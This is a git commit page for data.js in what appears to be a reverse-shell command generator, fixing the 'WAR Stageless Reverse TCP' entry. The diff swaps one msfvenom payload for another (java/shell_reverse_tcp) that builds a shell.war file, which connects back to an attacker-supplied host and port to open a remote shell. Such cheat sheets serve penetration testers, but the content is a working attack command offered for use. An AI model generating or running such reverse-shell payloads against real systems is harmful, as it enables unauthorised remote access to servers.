Update data.js

Fix WAR Stageless Reverse TCP
This commit is contained in:
Alvin Smith 2022-09-20 14:35:27 +12:00 committed by GitHub
parent 072ff301e7
commit 5362a888a6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -420,7 +420,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "WAR Stageless Reverse TCP",
"command": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war",
"command": "msfvenom -p java/shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war",
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
},
{